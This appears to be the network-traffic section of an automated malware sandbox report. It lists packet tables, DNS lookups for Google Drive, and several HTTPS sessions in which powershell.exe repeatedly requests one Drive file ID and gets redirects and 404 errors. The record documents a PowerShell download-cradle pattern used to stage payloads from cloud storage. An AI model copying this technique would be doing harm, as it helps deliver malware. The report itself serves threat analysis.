                Oct 1, 2024 07:47:20.143150091 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.030819893 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.032105923 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:21.032149076 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417536020 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417658091 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417745113 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:21.418107033 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439142942 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439196110 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:25.439259052 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439639091 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439656973 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.091983080 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.094033003 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:26.094044924 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486068964 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486660004 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486967087 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:26.489865065 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.485893011 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.485940933 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:30.490113974 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.490113974 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.490154028 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.320647001 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.322037935 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:32.322055101 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.942430019 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.943361044 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.943798065 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:32.944746971 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.953794956 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.953851938 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:36.953963041 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.954364061 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.954377890 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.583050013 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.584673882 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:37.584713936 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992053032 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992120028 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992197990 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:37.992556095 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004373074 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004420996 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.004478931 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004802942 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004812956 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.634550095 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.638525963 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.638552904 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.026295900 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.027512074 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.029000044 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:43.029618025 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:43.033293009 CEST49769443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:43.033343077 CEST44349769142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:43.033970118 CEST49769443192.168.2.4142.250.184.193

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 1, 2024 07:45:39.922274113 CEST5338453192.168.2.41.1.1.1
                Oct 1, 2024 07:45:39.928955078 CEST53533841.1.1.1192.168.2.4
                Oct 1, 2024 07:45:41.171855927 CEST6247153192.168.2.41.1.1.1
                Oct 1, 2024 07:45:41.179214954 CEST53624711.1.1.1192.168.2.4
                Oct 1, 2024 07:45:52.956139088 CEST6212653192.168.2.41.1.1.1
                Oct 1, 2024 07:45:52.963403940 CEST53621261.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 1, 2024 07:45:39.922274113 CEST192.168.2.41.1.1.10xaee3Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:41.171855927 CEST192.168.2.41.1.1.10x37adStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:52.956139088 CEST192.168.2.41.1.1.10x718dStandard query (0)drive.google.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 1, 2024 07:45:39.928955078 CEST1.1.1.1192.168.2.40xaee3No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:41.179214954 CEST1.1.1.1192.168.2.40x37adNo error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:52.963403940 CEST1.1.1.1192.168.2.40x718dNo error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:55.204531908 CEST1.1.1.1192.168.2.40x6374No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Oct 1, 2024 07:45:55.204531908 CEST1.1.1.1192.168.2.40x6374No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • drive.google.com
                • drive.usercontent.google.com

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449731142.250.184.2384437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:40 UTC215OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:41 UTC1610INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:41 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'nonce-0Bo8L6Bu6WXiEna8yF7JfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449732142.250.184.1934437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:41 UTC233OUTGET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:42 UTC1914INHTTP/1.1 404 Not Found
                Content-Type: text/html; charset=utf-8
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:42 GMT
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'nonce-q8oJJG7lrmgUDLiilGDf0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Length: 1652
                X-GUploader-UploadID: AD-8ljt1RjSv6hgWhcRactfyOsekMzQoC07JjKpaABR2hR8xVe1RT2GaqfvZpggRr918ay4YGoq842yUKA
                Server: UploadServer
                Set-Cookie: NID=517=TYYrH7PW08eA_e5U2OuC4zmekvTUxL9y9Z0hSYlicR1c__kVJQs5xULdovxIj3IMXPMi_rdS8LNeC_fCziXbKGAjzcMEW4yG8zarYR9db8593BfYRuwpe5m1rfnmNFR8-YVfvaeNQ2W03vkoB6kiM4lLNwH7YtVvhCXyrPd0UQxAzsyZ3d0; expires=Wed, 02-Apr-2025 05:45:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Content-Security-Policy: sandbox allow-scripts
                Connection: close
                2024-10-01 05:45:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6f 79 45 79 5f 56 62 59 4d 75 57 53 6a 52 4d 5f 45 48 45 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZoyEy_VbYMuWSjRM_EHE_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449733142.250.184.2384437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:47 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:47 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:47 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-C4iCy1tiJMhhz6Blmce_XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.449734142.250.184.1934437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:48 UTC139OUTGET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:48 UTC1599INHTTP/1.1 404 Not Found
                Content-Type: text/html; charset=utf-8
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:48 GMT
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Content-Security-Policy: script-src 'report-sample' 'nonce-_i0DtfREUVVlSIbKtp4JLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Length: 1652
                X-GUploader-UploadID: AD-8ljtljf0Ewfhqytx9iVo7nmtP2yYDqdRfk7K-KlU9Y2zyHbcMNuBPlWiupVMk9e0Ipjdkp8Lla0uERA
                Server: UploadServer
                Set-Cookie: NID=517=ayNybyF5N2eBPQYwkElV42dGDAo7dQDQxiFHFSICxvzYeUHQ8Auvb772g32F6tMuhU37CAI3kwDYH70R6YO3RPT0tciihaowI_fgJk0hB8bBGjogaqzZOxwWUoixwbKaXp4mZtGQuSZMsktz1QUq2laaEbkFMssVx1YBcZsGm_RpJq13Zw; expires=Wed, 02-Apr-2025 05:45:48 GMT; path=/; domain=.google.com; HttpOnly
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Content-Security-Policy: sandbox allow-scripts
                Connection: close
                2024-10-01 05:45:48 UTC1599INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 65 4a 34 72 71 58 6d 54 4e 77 36 67 58 6c 56 59 6d 59 47 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AeJ4rqXmTNw6gXlVYmYGhA">*{margin:0;padding:0}html,code{font:15px/22px arial
                2024-10-01 05:45:48 UTC53INData Raw: 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                Data Ascii: this server. <ins>Thats all we know.</ins></main>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.449737142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:53 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:45:54 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:53 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-aUZkpgS42Yx6qjCXjCohyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.449743142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:45:58 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:59 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:59 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: script-src 'report-sample' 'nonce-lMgX3qgHlDodSvq8gGixvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.449744142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:03 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:04 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:04 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-kLft7XF-v7NSQK5aO0uDpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.449745142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:08 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:46:09 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:09 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-C91xlqaOQ0jenHtaNST4aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.449746142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:46:13 UTC97OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:46:14 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:46:14 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-lLbVOgxGa3GypC_BcGos-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
